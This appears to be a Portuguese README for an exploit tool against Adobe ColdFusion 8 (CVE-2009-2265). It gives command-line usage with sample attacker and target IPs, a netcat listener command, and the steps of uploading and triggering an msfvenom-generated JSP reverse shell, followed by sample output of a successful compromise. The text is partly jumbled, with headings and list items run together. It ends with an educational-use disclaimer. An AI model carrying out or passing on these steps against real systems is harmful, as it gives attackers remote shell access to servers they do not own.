
Adobe ColdFusion 8 - Execução Remota de Comandos (RCE)
Este exploit visa uma vulnerabilidade conhecida no Adobe ColdFusion 8 (CVE-2009-2265). Ele permite a execução remota de comandos (RCE) ao carregar um payload JSP malicioso que estabelece uma conexão de reverse shell.
msfvenom.Para usar este exploit, você precisa do seguinte:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: IP do atacante local (ex., 10.10.16.5).-p <LPORT>: Porta local do atacante para o reverse shell (ex., 9001).-r <RHOST>: IP do alvo remoto (ex., 10.10.10.11).-q <RPORT>: Porta remota do alvo onde o ColdFusion está rodando (ex., 8500)../CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
Inicie um listener na sua máquina atacante:
nc -lnvp 9001
Execute o exploit com os argumentos apropriados.
Uma vez executado, o payload se conectará de volta ao seu listener.
Gerar Payload:
msfvenom para gerar um payload JSP malicioso.Carregar Payload:
Acionar Payload:
Estabelecer Reverse Shell:
msfvenom para geração do payload.curl para upload e acionamento do payload.nc (Netcat) para escutar conexões de reverse shell.[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
Este script é apenas para fins educacionais. Use-o em sistemas próprios ou com permissão explícita para testar. O uso não autorizado deste exploit em sistemas que não são seus é ilegal e antiético.
Desenvolvido por [0xDTC].